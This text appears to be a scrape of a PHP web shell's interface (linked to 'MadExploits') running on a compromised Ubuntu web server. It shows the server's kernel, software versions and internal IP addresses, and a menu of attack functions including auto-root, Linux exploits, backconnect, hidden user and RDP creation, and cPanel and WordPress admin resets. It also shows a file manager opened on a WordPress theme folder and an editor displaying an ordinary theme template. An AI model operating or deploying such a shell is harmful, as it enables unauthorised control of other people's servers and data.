Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
owc /
wp-content /
themes /
eduma-old /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-x--x
bbpress
[ DIR ]
drwxr-x--x
buddypress
[ DIR ]
drwxr-x--x
images
[ DIR ]
drwxr-x--x
inc
[ DIR ]
drwxr-x--x
languages
[ DIR ]
drwxr-x--x
learnpress-v3
[ DIR ]
drwxr-x--x
learnpress-v4
[ DIR ]
drwxr-x--x
lp-child-path
[ DIR ]
drwxr-x--x
our-team
[ DIR ]
drwxr-x--x
page-templates
[ DIR ]
drwxr-x--x
paid-memberships-pro
[ DIR ]
drwxr-x--x
plugins
[ DIR ]
drwxr-x--x
portfolio
[ DIR ]
drwxr-x--x
testimonials
[ DIR ]
drwxr-x--x
thim-elementor-kit
[ DIR ]
drwxr-x--x
thim-twitter
[ DIR ]
drwxr-x--x
vc_templates
[ DIR ]
drwxr-x--x
video-conferencing-zoom
[ DIR ]
drwxr-x--x
woocommerce
[ DIR ]
drwxr-x--x
wp-events-manager
[ DIR ]
drwxr-x--x
404.php
1.52
KB
-rwxr-x--x
archive.php
1.38
KB
-rwxr-x--x
changelog.html
45.18
KB
-rwxr-x--x
comments.php
3.24
KB
-rwxr-x--x
content-grid.php
2.55
KB
-rwxr-x--x
content-none.php
1.12
KB
-rwxr-x--x
content-page.php
492
B
-rwxr-x--x
content-search.php
1.64
KB
-rwxr-x--x
content-single.php
1.23
KB
-rwxr-x--x
content.php
1.49
KB
-rwxr-x--x
footer.php
695
B
-rwxr-x--x
functions.php
31.25
KB
-rwxr-x--x
header.php
1.92
KB
-rwxr-x--x
index.html
0
B
-rwxr-x--x
index.php
1.39
KB
-rwxr-x--x
integrations.txt
308
B
-rwxr-x--x
page.php
932
B
-rwxr-x--x
readme.txt
27
B
-rwxr-x--x
rtl-min.css
95.69
KB
-rwxr-x--x
rtl.css
110.99
KB
-rwxr-x--x
screenshot.png
202.42
KB
-rwxr-x--x
search.php
971
B
-rwxr-x--x
sidebar-courses.php
802
B
-rwxr-x--x
sidebar-events.php
1.98
KB
-rwxr-x--x
sidebar-shop.php
744
B
-rwxr-x--x
sidebar.php
724
B
-rwxr-x--x
single.php
997
B
-rwxr-x--x
style-editor.css
2.73
KB
-rwxr-x--x
style.css
1.17
MB
-rwxr-x--x
wpml-config.xml
17.3
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content-grid.php
<?php $classes = array(); $theme_options_data = get_theme_mods(); $columns = ! empty( $theme_options_data['thim_front_page_cate_columns_grid'] ) ? $theme_options_data['thim_front_page_cate_columns_grid'] : 3; $show_author = ! empty( $theme_options_data['thim_show_author'] ) && $theme_options_data['thim_show_author'] == '1'; $show_date = ! empty( $theme_options_data['thim_show_date'] ) && $theme_options_data['thim_show_date'] == '1'; $show_comment = ! empty( $theme_options_data['thim_show_comment'] ) && $theme_options_data['thim_show_comment'] == '1'; $classes[] = 'blog-grid-' . $columns; switch ( $columns ) { case 2: $arr_size = array( '570', '300' ); break; case 3: $arr_size = array( '370', '220' ); break; default: $arr_size = array( '270', '150' ); } ?> <article id="post-<?php the_ID(); ?>" <?php post_class( $classes ); ?>> <div class="content-inner"> <?php do_action( 'thim_entry_top', 'full' ); ?> <div class="entry-content"> <?php if ( has_post_format( 'link' ) && thim_meta( 'thim_link_url' ) && thim_meta( 'thim_link_text' ) ) { $url = thim_meta( 'thim_link_url' ); $title = thim_meta( 'thim_link_text' ); } else { $url = get_permalink(); $title = get_the_title(); } if ( $show_author ) { ?> <div class="author"> <?php echo get_avatar( get_the_author_meta( 'ID' ), 40 ); ?> <?php printf( '<span class="vcard author author_name"><a href="%1$s">%2$s</a></span>', esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ), esc_html( get_the_author() ) ); ?> </div> <?php } ?> <header class="entry-header"> <div class="entry-contain"> <?php echo sprintf( '<h2 class="entry-title"><a href="%s" rel="bookmark">%s</a></h2>', esc_url( $url ), esc_attr( $title ) ); ?> <?php thim_entry_meta(); ?> </div> </header> <div class="entry-grid-meta"> <?php if ( $show_date ) { ?> <div class="date"> <i class="fa fa-calendar"></i><?php echo get_the_date( get_option( 'date_format' ) ); ?> </div> <?php } if ( $show_comment ) { $comments = wp_count_comments( get_the_ID() ); ?> <div class="comments"><i class="fa fa-comment"></i><?php echo $comments->total_comments; ?> </div> <?php } ?> </div> <div class="entry-summary"> <?php the_excerpt(); ?> </div> <div class="readmore"> <a href="<?php echo esc_url( get_permalink() ); ?>"><?php echo esc_html__( 'Read More', 'eduma' ); ?></a> </div> </div> </div> </article><!-- #post-## -->
Close